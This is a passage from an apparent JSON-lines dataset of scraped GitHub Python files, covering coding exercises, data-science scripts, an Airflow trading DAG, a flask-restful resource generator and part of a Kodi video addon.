actual_point_after_rotation[1])\n\n\nif __name__ == '__main__':\n 
unittest.main()","repo_name":"macksimiljan/num3ric","sub_path":"tests/e2/test_rotation.py","file_name":"test_rotation.py","file_ext":"py","file_size_in_byte":2181,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1104211349","text":"# coding: utf-8\n\nfrom __future__ import absolute_import\nfrom datetime import date, datetime # noqa: F401\n\nfrom typing import List, Dict # noqa: F401\n\nfrom swagger_server.models.base_model_ import Model\nfrom swagger_server.models.network_identifier import NetworkIdentifier # noqa: F401,E501\nfrom swagger_server.models.partial_block_identifier import PartialBlockIdentifier # noqa: F401,E501\nfrom swagger_server import util\n\n\nclass BlockRequest(Model):\n \"\"\"NOTE: This class is auto generated by the swagger code generator program.\n\n Do not edit the class manually.\n \"\"\"\n def __init__(self, network_identifier: NetworkIdentifier=None, block_identifier: PartialBlockIdentifier=None): # noqa: E501\n \"\"\"BlockRequest - a model defined in Swagger\n\n :param network_identifier: The network_identifier of this BlockRequest. # noqa: E501\n :type network_identifier: NetworkIdentifier\n :param block_identifier: The block_identifier of this BlockRequest. # noqa: E501\n :type block_identifier: PartialBlockIdentifier\n \"\"\"\n self.swagger_types = {\n 'network_identifier': NetworkIdentifier,\n 'block_identifier': PartialBlockIdentifier\n }\n\n self.attribute_map = {\n 'network_identifier': 'network_identifier',\n 'block_identifier': 'block_identifier'\n }\n self._network_identifier = network_identifier\n self._block_identifier = block_identifier\n\n @classmethod\n def from_dict(cls, dikt) -> 'BlockRequest':\n \"\"\"Returns the dict as a model\n\n :param dikt: A dict.\n :type: dict\n :return: The BlockRequest of this BlockRequest. 
# noqa: E501\n :rtype: BlockRequest\n \"\"\"\n return util.deserialize_model(dikt, cls)\n\n @property\n def network_identifier(self) -> NetworkIdentifier:\n \"\"\"Gets the network_identifier of this BlockRequest.\n\n\n :return: The network_identifier of this BlockRequest.\n :rtype: NetworkIdentifier\n \"\"\"\n return self._network_identifier\n\n @network_identifier.setter\n def network_identifier(self, network_identifier: NetworkIdentifier):\n \"\"\"Sets the network_identifier of this BlockRequest.\n\n\n :param network_identifier: The network_identifier of this BlockRequest.\n :type network_identifier: NetworkIdentifier\n \"\"\"\n if network_identifier is None:\n raise ValueError(\"Invalid value for `network_identifier`, must not be `None`\") # noqa: E501\n\n self._network_identifier = network_identifier\n\n @property\n def block_identifier(self) -> PartialBlockIdentifier:\n \"\"\"Gets the block_identifier of this BlockRequest.\n\n\n :return: The block_identifier of this BlockRequest.\n :rtype: PartialBlockIdentifier\n \"\"\"\n return self._block_identifier\n\n @block_identifier.setter\n def block_identifier(self, block_identifier: PartialBlockIdentifier):\n \"\"\"Sets the block_identifier of this BlockRequest.\n\n\n :param block_identifier: The block_identifier of this BlockRequest.\n :type block_identifier: PartialBlockIdentifier\n \"\"\"\n if block_identifier is None:\n raise ValueError(\"Invalid value for `block_identifier`, must not be `None`\") # noqa: E501\n\n self._block_identifier = block_identifier\n","repo_name":"xanimo/rosetta-api","sub_path":"server/python-flask-server-generated/swagger_server/models/block_request.py","file_name":"block_request.py","file_ext":"py","file_size_in_byte":3359,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26922470953","text":"def count_ways(n):\n if n<=1:\n return 1\n d=[0]*(n+1)\n d[1]=1\n for i in range(2,n+1):\n d[i]+=d[i-1]\n d[i]+=d[i-3]\n if i%2==0:\n d[i]+=d[i//2]\n return d[n]\nn = int(input(('Введите значение n: ')))\nresult = count_ways(n)\nprint(f'Кол-во способов достичь {n} из точки 1: {result}')\n","repo_name":"setusq/PraktikaG34N6","sub_path":"pz6/dynamic_prog.py","file_name":"dynamic_prog.py","file_ext":"py","file_size_in_byte":371,"program_lang":"python","lang":"bg","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24983233708","text":"import mne\nfrom mne.report import Report\nimport basic.process as process\nimport eelbrain as E\nimport os\nfrom mayavi import mlab\nmlab.options.offscreen = True\n\ne = process.NMG(None, '{home}')\nraw = 'calm_fft_hp1_lp40'\ne.set(raw = raw)\ne.set(analysis='data_quality')\n# report = Report()\n\nfor subject in subjects:\n# for _ in e:\n e.set(subject=subject)\n ds = e.load_events()\n ds = ds[ds['target'] == 'prime']\n ds = e.make_epochs(ds, tmin=-.2, tmax=.6, reject={'mag': 3e-12}, baseline=(None, 0))\n # covariance\n if 'epochs' in ds:\n ds = ds.aggregate('target', drop_bad=True)\n cov = e.get('cov', raw = raw + '_auto')\n if os.path.exists(cov):\n cov = mne.read_cov(e.get('cov', raw=raw + '_auto') )\n picks = mne.pick_types(ds['epochs'][0].info)\n evoked_white = mne.cov.whiten_evoked(ds['epochs'][0], cov, picks, diag=True)\n p = evoked_white.plot(picks=picks, unit=False, hline=[-2, 2], show=False)\n report.add_figs_to_section(p, [e.subject + '_cov'], 'Covariance')\n # coregistration\n p = mne.viz.plot_trans(ds.info['raw'].info, trans_fname=e.get('trans'),\n subject=e.subject, subjects_dir=e.get('mri_dir'),\n 
ch_type='meg', source='head')\n report.add_figs_to_section(p, [e.subject + '_coreg'], 'Coregistration')\n # bem\n p = mne.viz.plot_bem(e.subject, e.get('mri_dir'), 'coronal', show=False)\n report.add_figs_to_section(p, [e.subject + '_bem_coronal'], 'Bem Coronal')\n p = mne.viz.plot_bem(e.subject, e.get('mri_dir'), 'axial', show=False)\n report.add_figs_to_section(p, [e.subject + '_bem_axial'], 'Bem Axial')\n p = mne.viz.plot_bem(e.subject, e.get('mri_dir'), 'sagittal', show=False)\n report.add_figs_to_section(p, [e.subject + '_bem_tranverse'], 'Bem Sagittal')\n \n\nreport.save(e.get('report-file'), open_browser=False)","repo_name":"teonbrooks/NMG-project","sub_path":"exp_scripts/3_mne_report.py","file_name":"3_mne_report.py","file_ext":"py","file_size_in_byte":1891,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36028005217","text":"import warnings\n\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nfrom sklearn.externals import joblib\nfrom sklearn.linear_model import LogisticRegressionCV\nfrom sklearn.linear_model.coordinate_descent import ConvergenceWarning\nfrom sklearn.model_selection import train_test_split # 数据划分的类\nfrom sklearn.preprocessing import StandardScaler # 数据标准化\n\n# 设置字符集,防止中文乱码\nmpl.rcParams['font.sans-serif'] = [u'simHei']\nmpl.rcParams['axes.unicode_minus'] = False\n# 拦截异常\nwarnings.filterwarnings(action='ignore', category=ConvergenceWarning)\n\npath = \"datas/breast-cancer-wisconsin.data\"\nnames = ['id', 'Clump Thickness', 'Uniformity of Cell Size', 'Uniformity of Cell Shape',\n 'Marginal Adhesion', 'Single Epithelial Cell Size', 'Bare Nuclei', 'Bland Chromatin', 'Normal Nucleoli',\n 'Mitoses', 'Class']\n\ndf = pd.read_csv(path, header=None, names=names)\n\ndata = df.replace('?', np.nan).dropna(how='any') # 只要有列为空,就进行删除操作\n\nprint(data.head(5))\n\n# 1.数据提取以及数据分割\n# 提取\nX = data[names[1:10]]\nY = data[names[10]]\n\n# 分割\nX_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=0.2, random_state=0)\n\n# 2.数据格式化(归一化)\nss = StandardScaler()\nX_train = ss.fit_transform(X_train) # 训练模型及归一化数据\n\n# 3.模型构建及训练\n\nlr = LogisticRegressionCV(multi_class='ovr', fit_intercept=True, Cs=np.logspace(-2, 2, 20), cv=2, penalty='l2',\n solver='lbfgs', tol=0.01)\nre = lr.fit(X_train, Y_train)\n\nr = re.score(X_train, Y_train)\n\n# 4.模型效果获取\nprint(\"R值(准确率):\", r)\nprint(\"稀疏化特征比率:%.2f%%\" % (np.mean(lr.coef_.ravel() == 0) * 100))\nprint(\"参数:\", re.coef_)\nprint(\"截距:\", re.intercept_)\nprint(re.predict_proba(X_test)) # 获取sigmoid函数返回的概率值\n\n# 5.模型相关信息保存\njoblib.dump(lr, \"result/ss.model\")\n\noss = joblib.load(\"result/ss.model\")\n\n# # 数据预测\n# a.预测数据格式化(归一化)\nX_test = ss.transform(X_test) # 使用模型进行归一化操作\n\n# b.结果数据预测\nY_predict = oss.predict(X_test)\n\n# 图标展示\nx_len = range(len(X_test))\nplt.figure(figsize=(14, 7), facecolor='w')\nplt.ylim(0, 6)\nplt.plot(x_len, Y_test, 'ro', markersize=8, zorder=3, label=u'真实值')\nplt.plot(x_len, Y_predict, 'go', markersize=15, zorder=2, label=u'预测值,$R^2$=%.3f' % re.score(X_test, Y_test))\nplt.legend(loc='upper left')\nplt.xlabel(u'数据编号', fontsize=18)\nplt.xlabel(u'乳腺癌类型', fontsize=18)\nplt.title(u'Logistic回归算法对数据进行分类', fontsize=20)\nplt.show()\n","repo_name":"myDemoMike/MachineLearning","sub_path":"003LinearRegression/逻辑回归:乳腺癌分类.py","file_name":"逻辑回归:乳腺癌分类.py","file_ext":"py","file_size_in_byte":2683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} 
+{"seq_id":"30910866638","text":"def part1(nums):\n jolt_1 = 0\n jolt_3 = 0\n base = 0\n for i in range(len(nums)):\n jolt = min([x for x in nums if base < x <= (base + 3)])\n if (jolt - base) == 1:\n jolt_1 += 1\n if (jolt - base) == 3:\n jolt_3 += 1\n base = jolt\n\n return jolt_1 * (jolt_3 + 1)\n\n\ndef dist_ways_ways(nums, base, index, inf):\n if base == max(nums):\n return 1\n\n key = base * 10000 + index\n if key in inf:\n return inf[key]\n\n w = 0\n ad = [x for x in nums if base < x <= (base + 3)]\n for a in ad:\n if a in nums:\n w = w + dist_ways_ways(nums, a, index + 1, inf)\n\n inf[key] = w\n return w\n\n\ndef part2(nums):\n inf = {}\n return dist_ways_ways(nums, 0, 0, inf)\n\n\nif __name__ == '__main__':\n with open('10.txt') as _file:\n lines = [int(line) for line in _file.read().splitlines()]\n nums = [int(x) for x in lines]\n\n print(\"Part 1 answer: \", part1(nums))\n print(\"Part 2 answer: \", part2(nums))\n","repo_name":"Cipulot/AdventOfCode","sub_path":"2020/day10.py","file_name":"day10.py","file_ext":"py","file_size_in_byte":1001,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6158059679","text":"# Programa com função ficha() que recebe dois parâmetros opcionais: nome do jogador e quantos gols ele marcou\n# Programa deve mostrar a ficha do jogador, mesmo que algum dado não tenha sido informado corretamente\ndef ficha(jogador='', gols=0):\n print(f'O jogador {jogador} fez {gols} gols(s).')\n\n\nnome = str(input('Digite o nome do jogador: '))\ngols = str(input(f'Quantos gols {nome} fez?'))\nif gols.isnumeric():\n gols = int(gols)\nelse:\n g = 0\nif nome.strip() == '':\n ficha(gols=gols)\nelse:\n ficha(nome, gols)","repo_name":"gabcarvalhaes/curso-em-video","sub_path":"python-mundo-3/exercicios/ex103.py","file_name":"ex103.py","file_ext":"py","file_size_in_byte":543,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73577172969","text":"from pyspark.sql import SparkSession, Window\nfrom pyspark import find_spark_home, HiveContext\nfrom pyspark.sql.functions import year, col, lit, row_number, desc, dense_rank, to_timestamp\n\nfrom SparkSessionBase import SparkSessionBase\n\nclass RecommendByRecentReview(SparkSessionBase):\n SPARK_URL = \"local\"\n SPARK_APP_NAME = 'TextRandJob'\n ENABLE_HIVE_SUPPORT = True\n\n def __init__(self):\n self.spark = self._create_spark_session()\n\n def start(self):\n hc=HiveContext(self.spark.sparkContext)\n re_df=hc.table('review').limit(50000)\n w1=Window.partitionBy('rev_user_id').orderBy(col('rev_date').desc())\n result=re_df.select('rev_user_id','review_id','rev_business_id','rev_date',dense_rank().over(w1))\n result.show()\n# XXX 大数据分析代码\n\nif __name__ == '__main__':\n RecommendByRecentReview().start()","repo_name":"KYJ2021/bigdata","sub_path":"RecommendByRecentReview.py","file_name":"RecommendByRecentReview.py","file_ext":"py","file_size_in_byte":863,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36843930595","text":"from time import sleep\n\n\ndef change_direction(current_direction):\n if current_direction == 0:\n return 3\n else:\n return current_direction - 1\n\n\ndef back_direction(current_direction):\n if current_direction == 0:\n return 2\n elif current_direction == 1:\n return 3\n else:\n return current_direction - 2\n\n\ndef set_next(a, b, direction):\n if direction == 3:\n a = a + dy[1]\n b = b + dx[1]\n elif direction == 2:\n a = a + dy[2]\n b = 
b + dx[2]\n elif direction == 1:\n a = a + dy[0]\n b = b + dx[0]\n else:\n a = a + dy[3]\n b = b + dx[3]\n\n return a, b\n\n\n# 동 서 남 북\ndx = [1, -1, 0, 0]\ndy = [0, 0, 1, -1]\ncount = 0\nnext_a = 0\nnext_b = 0\n\nn, m = map(int, input().split())\na, b, direction = map(int, input().split())\n\nboard = []\nis_visited = [[0] * m for _ in range(n)] # 0 :아직 안들림 1 : 들림\n\n\nfor i in range(n):\n board.append(list(map(int, input().split())))\n\nis_visited[b][a] = 1\ncount = count + 1\n\nwhile True:\n is_move = False\n for i in range(4):\n direction = change_direction(direction)\n next_a, next_b = set_next(a, b, direction)\n # 바다 거나, 들렸던 칸이면\n if board[next_b][next_a] == 1 or is_visited[next_b][next_a] == 1:\n print(\"바다거나, 들렸던 칸임: [%d, %d]\" % (next_b, next_a))\n sleep(1)\n continue\n else:\n print(\"방문: [%d, %d]\" % (next_b, next_a))\n sleep(1)\n count = count + 1\n a = next_a\n b = next_b\n is_visited[next_b][next_a] = 1\n is_move = True\n break\n next_a, next_b = set_next(a, b, back_direction(direction))\n if board[next_b][next_a] == 1:\n break\n elif is_move == False:\n a = next_a\n b = next_b\n print(\"뒤로가기: [%d, %d]\" % (next_b, next_a))\n sleep(1)\n\n\nprint(count)\n# 1. 방향 바꾸기\n","repo_name":"2yunseong/Algorithm","sub_path":"ndb/implementation/example4_4.py","file_name":"example4_4.py","file_ext":"py","file_size_in_byte":1965,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24231887165","text":"\"\"\"\n有一分数序列:2/1,3/2,5/3,8/5,13/8,21/13...求出这个数列的前20项之和。\n思路:\n引入reduce 进行相加\n规律 前一个的分子是第二个的分母 前一个分子分母相加等于第二个分子\n\"\"\"\nfrom functools import reduce\nl=[]\nm=2\nn=1\nl.append(m/n)\nfor i in range(1,20):\n n,m=m,m+n\n l.append(m/n)\n\nsum = reduce(lambda x,y:x+y,l)\nprint(sum)","repo_name":"liucheng2912/py","sub_path":"100例/24.py","file_name":"24.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6676979504","text":"from airflow import DAG\nfrom airflow.operators.python import PythonOperator\nfrom airflow.utils.dates import days_ago\nfrom utils import strategy\nfrom datetime import timedelta\nimport os\n\nDAG_ID = os.path.basename(__file__).replace('.pyc', '').replace('.py', '')\nCONN_ID = 'postgres_stocks'\n\nSMA = 30\nDEV = 2\n\ndefault_args = {\n 'owner': 'airflow',\n 'depends_on_past': False,\n 'start_date': days_ago(1),\n 'retries': 2,\n 'retry_delay': timedelta(minutes=5),\n 'email_on_failure': False,\n 'email_on_retry': False,\n}\n\nwith DAG(\n dag_id=DAG_ID,\n default_args=default_args,\n schedule_interval='10 1 * * *',\n) as dag:\n\n bollinger_bands_aapl = PythonOperator(\n task_id='bollinger_bands_aapl',\n python_callable=strategy.apply_strategy,\n op_kwargs={\n 'connector': CONN_ID,\n 'source_table_name': 'aapl',\n 'ticker': 'AAPL',\n 'strategy_func': strategy.bollinger_bands_strategy,\n 'op_kwargs': {\n 'sma': SMA,\n 'dev': DEV,\n }\n }\n )\n\n","repo_name":"airflow-courses/udemy_algo_trading_airflow","sub_path":"airflow/dags/strategy/bollinger_bands_strategy.py","file_name":"bollinger_bands_strategy.py","file_ext":"py","file_size_in_byte":1074,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"20509276815","text":"#!/usr/bin/env python\n#\n# License: BSD\n# https://raw.github.com/stonier/py_trees_ros/license/LICENSE\n#\n##############################################################################\n# 
Documentation\n##############################################################################\n\n\"\"\"\nThis node captures the rtreachabiliy decision result over safety\n\"\"\"\n\n##############################################################################\n# Imports\n##############################################################################\n\nimport py_trees\nimport rospy\nimport sensor_msgs.msg as sensor_msgs\nfrom std_msgs.msg import Float32\nfrom py_trees_ros import subscribers\n############<>##############################\nimport numpy as np\nimport math\nfrom collections import deque\n############<>################################\n\n##############################################################################\n# Blackboard node\n##############################################################################\n\n\nclass ToBlackboard(subscribers.ToBlackboard):\n \"\"\"\n Subscribes to the battery message and writes battery data to the blackboard.\n Also adds a warning flag to the blackboard if the battery\n is low - note that it does some buffering against ping-pong problems so the warning\n doesn't trigger on/off rapidly when close to the threshold.\n\n When ticking, updates with :attr:`~py_trees.common.Status.RUNNING` if it got no data,\n :attr:`~py_trees.common.Status.SUCCESS` otherwise.\n\n Blackboard Variables:\n * rtreach_result: the raw message from topic /reachability_result\n * emergency_stop_warning (:obj:`bool`)\n * rtreach_warning (:obj:`bool`)\n * rtreach_long_term_warning (:obj:`bool`)\n Args:\n name (:obj:`str`): name of the behaviour\n topic_name (:obj:`str`) : name of the input topic \n enable_emergency_stop (:obj:`float`) : parameter \n rtreach_window_size (:obj:`float`) : parameter \n rtreach_window_threshold (:obj:`float`) : parameter \n \"\"\"\n def __init__(self, \n name, \n topic_name=\"rtreach_result\", \n enable_emergency_stop=True, \n rtreach_window_size=25, \n rtreach_window_threshold=0.75 \n ):\n \n super(ToBlackboard, self).__init__(name=name,\n topic_name=topic_name,\n topic_type=Float32,\n blackboard_variables={\"rtreach_result\":None},\n clearing_policy=py_trees.common.ClearingPolicy.NEVER\n )\n self.blackboard = py_trees.blackboard.Blackboard()\n \n self.blackboard.rtreach_result = Float32()\n \n self.blackboard.emergency_stop_warning = False\n self.blackboard.rtreach_warning = False\n self.blackboard.rtreach_long_term_warning = False\n \n self.enable_emergency_stop=enable_emergency_stop \n self.rtreach_window_size=rtreach_window_size \n self.rtreach_window_threshold=rtreach_window_threshold \n############<>##############################\n self.rtreach_window = deque(maxlen=rtreach_window_size)\n self.rtreach_long_term_pub = rospy.Publisher( '/uuv0/rtreach_long_term',\n Float32,\n queue_size=1) \n############<>################################\n def update(self):\n \"\"\"\n Call the parent to write the raw data to the blackboard and then check against the\n parameters to update the bb variable\n \"\"\"\n self.logger.debug(\"%s.update()\" % self.__class__.__name__)\n status = super(ToBlackboard, self).update()\n if status == py_trees.common.Status.RUNNING:\n return status\n############<>##############################\n # Old way, using binary rtreach output\n # if self.blackboard.rtreach_result.data < 1.0 and self.enable_emergency_stop:\n # self.blackboard.emergency_stop_warning = True\n # rospy.logwarn_throttle(1, \"%s: emergency_stop_warning!\" % self.name)\n \n # long term rtreach\n if rospy.Time.now() > rospy.Time(5): \n val = (max(\n max(\n 
min(math.exp(self.blackboard.rtreach_index.data) / 4.0, 0.5)\n ,0),\n self.blackboard.rtreach_result.data)\n )\n self.rtreach_window.append(val)\n # 1: safe, 0: unsafe\n if (np.mean(self.rtreach_window) < self.rtreach_window_threshold) and len(self.rtreach_window) == self.rtreach_window_size:\n self.blackboard.rtreach_long_term_warning = True\n rospy.logwarn(\"%s: **** rtreach_long_term_warning (%0.2f)\" % (self.name, val))\n else:\n self.blackboard.rtreach_long_term_warning = False\n\n if self.blackboard.rtreach_result.data < 1.0:\n self.blackboard.rtreach_warning = True\n rospy.logwarn(\"%s: rtreach_warning\" % self.name)\n else:\n self.blackboard.rtreach_warning = False\n self.rtreach_long_term_pub.publish(Float32(np.mean(self.rtreach_window)))\n\n\n############<>################################\n return status\n \n############<>##############################\n############<>################################","repo_name":"AbLECPS/alc","sub_path":"bluerov2_standalone/catkin_ws/src/vandy_bluerov/behaviour_tree_gen/bb_rtreach2bb.py","file_name":"bb_rtreach2bb.py","file_ext":"py","file_size_in_byte":5835,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"32239549105","text":"#\n# Rank: MEDIUM\n# Score: 25/25\n# HackerRank Link: https://www.hackerrank.com/challenges/the-time-in-words/problem\n#\n\n# (5, 00, \"five o' clock\"), /\n# (5, 01, \"one minute past five\"),\n# (5, 10, \"ten minutes past five\"),\n# (5, 15, \"quarter past five\"),\n# (5, 28, \"twenty eight minutes past five\"),\n# (5, 30, \"half past five\"),\n# (5, 40, \"twenty minutes to six\"),\n# (5, 45, \"quarter to six\"),\n# (5, 47, \"thirteen minutes to six\")\n\n\nimport math\n\n\ndef the_time_in_words(h, m):\n if m == 0:\n return '{:s}{:s}'.format(number_mapping(h), time_mapping(0))\n\n if m <= 30: # past\n conj = 1\n hour = h\n else: # to\n conj = 2\n hour = (h+1) % 12\n m = 60 - m\n\n minute = number_mapping(m)\n if not minute:\n tens = tens_mapping(int(math.floor(m / 10)))\n units = number_mapping(m % 10)\n\n if not tens:\n minute = units + 'teen'\n elif not units:\n minute = tens\n else:\n minute = '{:s} {:s}'.format(tens, units)\n\n minute = minute_mapping(minute, m)\n\n return '{:s}{:s}{:s}'.format(minute,\n time_mapping(conj),\n number_mapping(hour))\n\n\ndef tens_mapping(t):\n return{\n 2: 'twenty'\n }.get(t, None)\n\n\ndef number_mapping(n):\n return{\n 1: 'one',\n 2: 'two',\n 3: 'three',\n 4: 'four',\n 5: 'five',\n 6: 'six',\n 7: 'seven',\n 8: 'eight',\n 9: 'nine',\n 10: 'ten',\n 11: 'eleven',\n 12: 'twelve',\n 13: 'thirteen',\n 15: 'quarter',\n 30: 'half'\n }.get(n, '')\n\n\ndef time_mapping(t):\n return{\n 0: ' o\\' clock',\n 1: ' past ',\n 2: ' to '\n }.get(t, '')\n\n\ndef minute_mapping(minute, m):\n if m == 15 or m == 30:\n return minute\n return{\n True: '{:s} minutes'.format(minute),\n False: '{:s} minute'.format(minute)\n }.get(m > 1, None)\n","repo_name":"meanthadar-p/python-practice","sub_path":"Medium/TheTimeInWords/TheTimeInWords.py","file_name":"TheTimeInWords.py","file_ext":"py","file_size_in_byte":1951,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70544129770","text":"def print_lines (filename):\n with open (filename) as file:\n for line in file:\n print (line.strip())\n\ndef word_search (filename):\n word = input (\"Enter a word: \")\n word_lower = word.lower()\n with open (filename) as file:\n for line in file:\n line = line.strip ()\n line_lower = line.lower ()\n if 
word_lower == line_lower:\n print (\"Word was found!\")\n file.close ()\n return\n \n print (\"Word was not found!\")\n file.close ()\n\ndef longest_word (a_string):\n tokens = a_string.split()\n longest = \"\"\n for word in tokens:\n if len(word) > len(longest):\n longest = word\n print (longest)\n return longest\n\ndef longest_words (filename):\n longest = \"\"\n with open (filename) as file:\n for line in file:\n stripped = line.strip()\n if stripped != \"\":\n word = longest_word (line)\n if len(word) > len (longest):\n print (word)\n\ndef prompt_and_write ():\n filename = input (\"Enter a filename: \")\n with open (filename, \"w\") as file:\n while True:\n line = input (\">> \")\n if line == \"\":\n break\n else:\n file.write (line)\n file.write (\"\\n\")\n\ndef main ():\n # print_lines (\"data/alice.txt\")\n # word_search (\"data/words.txt\")\n # longest_word (\"The quick brown fox jumped over the lazy dog.\")\n # longest_words (\"data/alice.txt\")\n prompt_and_write ()\n \nif __name__ == \"__main__\":\n main ()\n","repo_name":"alextedesco/GCIS-120","sub_path":"Unit03/files.py","file_name":"files.py","file_ext":"py","file_size_in_byte":1599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19770966015","text":"# flask_restful_dbbase/generator.py\n\"\"\"\nThis module implements a technique for creating resources with specific\nmethods.\n\nA customized resource can be created from a resource, but with some\nof the default HTTP methods removed, but with customized resource\nmodifications applied to make a unique resource.\n\"\"\"\nfrom flask_restful_dbbase.resources import DBBaseResource\n\n\ndef create_resource(\n name,\n resource_class,\n model_class=None,\n methods=None,\n url_prefix=None,\n url_name=None,\n class_vars=None,\n):\n \"\"\"\n This function creates a resource based on a source model class\n and a seed resource.\n\n Args:\n name: (str) : This will be the name stored with the new\n class.\n\n resource_class: (obj) : This is the ModelResource class that\n will be used as the basis of the new class.\n\n methods: (list) : This the list of HTTP methods that should\n be transferred to the new class.\n\n url_prefix: (str) : This is url_prefix that can be used in place of\n the default url_prefix that comes with the resource class.\n\n url_name: (str) : This the url_name that can be used in place\n of the default url_name that comes with the resource.\n\n class_vars: (dict) : This is a dictionary of variables and\n values that will be transferred to the new resource. 
These\n are set in place last, so it is here that additional\n customization of the new resource can be made.\n\n Returns:\n (obj) : The new resource class\n \"\"\"\n params = {}\n if model_class is not None:\n params[\"model_class\"] = model_class\n if url_prefix is not None:\n params[\"url_prefix\"] = url_prefix\n if url_prefix is not None:\n params[\"url_name\"] = url_name\n\n # accumulate changes from subclassing\n # follow subclassing order\n class_dict = {}\n idx = resource_class.mro().index(DBBaseResource)\n for i in range(idx - 1, -1, -1):\n cls = resource_class.mro()[i]\n class_dict.update(cls.__dict__)\n if methods is not None:\n # create stop list\n stop_method_list = [\"get\", \"post\", \"put\", \"patch\", \"delete\"]\n for method in methods:\n if method in stop_method_list:\n stop_method_list.remove(method)\n\n for method in stop_method_list:\n del class_dict[method]\n del class_dict[f\"process_{method}_input\"]\n class_dict[\"methods\"] = set([method.upper() for method in methods])\n\n class_dict.update(params)\n\n if class_vars is not None:\n class_dict.update(class_vars)\n\n new_class = type(\n name,\n (DBBaseResource,),\n class_dict,\n )\n\n # required model check\n if new_class.model_class is None:\n raise ValueError(\"A model class must be defined\")\n\n return new_class\n","repo_name":"sidorof/flask-restful-dbbase","sub_path":"flask_restful_dbbase/generator.py","file_name":"generator.py","file_ext":"py","file_size_in_byte":2852,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"1350131215","text":"\"\"\"The :mod:`pyts.multivariate.utils` module includes utility tools.\"\"\"\n\nfrom sklearn.utils import check_array\n\n\ndef check_3d_array(X):\n \"\"\"Check that the input is a three-dimensional arrayself.\n\n Parameters\n ----------\n X : array-like\n Input data\n\n \"\"\"\n X = check_array(X, ensure_2d=False, allow_nd=True)\n if X.ndim != 3:\n raise ValueError(\"X must be 3-dimensional (got {0}).\".format(X.ndim))\n return X\n","repo_name":"martanto/pyts","sub_path":"pyts/multivariate/utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"72634647848","text":"# -*- coding: utf-8 -*-\r\nimport xbmc\r\nimport sys, xbmcplugin, xbmcgui, xbmcaddon, os, json, hashlib, re, unicodedata, math, xbmcvfs\r\nimport shutil\r\nfrom urllib.parse import urlparse, quote_plus, unquote, urlencode\r\nfrom urllib.request import urlopen, Request\r\nimport urllib.request, urllib.parse, urllib.error\r\nimport urllib.parse\r\n\r\nfrom metadatautils import MetadataUtils\r\nmg = MetadataUtils()\r\nmg.tmdb.api_key = 'bd6af17904b638d482df1a924f1eabb4'\r\n\r\nAddonID = 'plugin.video.CubeTor'\r\nAddon = xbmcaddon.Addon(AddonID)\r\nAddonName = Addon.getAddonInfo(\"name\")\r\naddonDir = Addon.getAddonInfo('path')\r\nicon = os.path.join(addonDir,\"icon.png\")\r\niconsDir = os.path.join(addonDir, \"resources\", \"images\")\r\n\r\nMUlang = \"pt-BR\" if Addon.getSetting(\"MUlang\") == \"1\" else \"en\"\r\nMUlangM = \"pt-BR\" if Addon.getSetting(\"MUlangM\") == \"1\" else \"en\"\r\nMUcache = True if Addon.getSetting(\"MUcache\") == \"true\" else False\r\nMUcacheEpi = True if Addon.getSetting(\"MUcacheEpi\") == \"true\" else False\r\nMUfanArt = True if Addon.getSetting(\"MUfanArt\") == \"true\" else False\r\n\r\nlibDir = os.path.join(addonDir, 'resources', 'lib')\r\nsys.path.insert(0, libDir)\r\nimport xx, 
common\r\n\r\naddon_data_dir = xbmcvfs.translatePath(Addon.getAddonInfo(\"profile\"))\r\ncacheDir = os.path.join(addon_data_dir, \"cache\")\r\n#-----------------------------------------\r\nparams = urllib.parse.parse_qs(sys.argv[2][1:])\r\nname = params.get('name',[None])[0]\r\nurl = params.get('url',[None])[0]\r\nmode = params.get('mode',[None])[0]\r\niconimage = params.get('iconimage',[None])[0]\r\nlogos = params.get('logos',[None])[0]\r\ninfo = params.get('info',[None])[0]\r\ndados = params.get('dados',[{}])[0]\r\n#-----------------------------------------\r\ndef PeerSeed(url2):\r\n\timport html\r\n\ttry:\r\n\t\tlink = quote_plus(html.unescape(url2))\r\n\t\tseeds = common.OpenURL(\"https://checker.openwebtorrent.com/check?magnet=\"+link, ssl=True)\r\n\t\tj = json.loads(seeds)\r\n\texcept:\r\n\t\tj = {\"error\": \"nao carregou\"}\r\n\treturn j\r\n#-----------------------------------------\r\ndef BuscaTvShowsPre():\r\n\tq = xbmcgui.Dialog().input(\"O que busca? (Séries)\")\r\n\tif not q:\r\n\t\tRP = \"plugin://plugin.video.CubeTor/?mode=&url=\"\r\n\t\txbmc.executebuiltin('ActivateWindow(10025,\"'+RP+'\")')\r\n\t\treturn\r\n\tRP = \"plugin://plugin.video.CubeTor/?mode=google.BuscaTvShows&url=\"+quote_plus(q)\r\n\txbmc.executebuiltin('ActivateWindow(10025,\"'+RP+'\")')\r\ndef BuscaTvShows():\r\n\tlink = 